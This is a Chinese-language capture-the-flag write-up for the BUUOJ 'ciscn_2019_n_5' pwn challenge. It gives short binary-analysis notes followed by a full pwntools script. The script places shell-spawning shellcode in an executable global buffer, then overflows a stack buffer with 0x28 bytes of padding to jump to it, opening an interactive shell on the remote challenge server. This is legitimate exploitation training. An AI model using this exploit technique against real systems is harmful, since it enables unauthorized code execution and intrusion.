checksec
运行
直接输入就行
ida&gdb
main
函数里:
name
是全局变量,且存放在.bss
段,地址在ELF文件中位于数据段
,编译链接时由动态链接器进行初始化,因此在运行时可以它就同时具有RWX权限,可以用来存放shellcodeget(v4)
存在溢出
给v4分配的栈空间为0x28
利用思路
可RWX的全局变量存储shellcode,局部变量溢出调用shellcode
代码
'''
@Author : 白银
@Date : 2023-04-07 15:04:00
@LastEditors : 白银
@LastEditTime : 2023-04-07 16:03:50
@FilePath : /pwn/ciscn_2019_n_5.py
@Description : https://buuoj.cn/challenges#ciscn_2019_n_5
@Attention :
@Copyright (c) 2023 by 白银 captain-jparrow@qq.com, All Rights Reserved.
'''
from pwn import *
# from libcfind import *
set_arch = 0 # set_arch中,int,0→amd64,1→arm64,2→i386
pwnfile = './ciscn_2019_n_5' # pwnfile, str,二进制文件
if_remote = 1 # if_remote,int,1→远程,别的数字→本地
# 打本地,if_remote改别的数字就可以,最后两个参数随便改
# set_arch = 0
if set_arch == 0:
context(log_level='debug', arch='amd64', os='linux')
elif set_arch == 1:
context(log_level='debug', arch='arm64', os='linux')
elif set_arch == 2:
context(log_level='debug', arch='i386', os='linux')
print(context)
# context(log_level='debug', arch='i386', os='linux')
# pwnfile = './pwn1'
elf = ELF(pwnfile)
if if_remote == 1:
# io = remote("192.168.61.139", 8888)
# io = remote(remote_addr, remote_port)
io = remote("node4.buuoj.cn", 26271)
# libc = ELF('/home/usrname/Desktop/libc.so.6')
if set_arch == 0 or set_arch == 1:
libc = elf.libc
# libc = ELF('/home/usrname/Desktop/libc-2.23.so')
# libc = ELF('/home/usrname/Desktop/2.23x64libc.so.6')
else:
libc = elf.libc
# libc = ELF('/home/usrname/Desktop/libc-2.23.so')
# libc = ELF('/home/usrname/Desktop/2.23x86libc.so.6')
else:
io = process(pwnfile)
# 本地用
# elf = ELF(pwnfile)
libc = elf.libc
# libc = ELF('/home/usrname/Desktop/libc-2.23.so')
rop = ROP(pwnfile)
# 本地调试用
gdb.attach(io)
pause()
return_addr = 0x601080 # p &name,可以rwx的全局变量,此题的name存放在bss段,在elf文件中位于data段,可rwx
padding = 0x28 # ida看上限到r的距离
payload1 = flat([asm(shellcraft.sh())])
io.sendlineafter('tell me your name', payload1)
payload2 = flat(['a' * padding, return_addr])
io.sendlineafter('What do you want to say to me?', payload2)
io.interactive()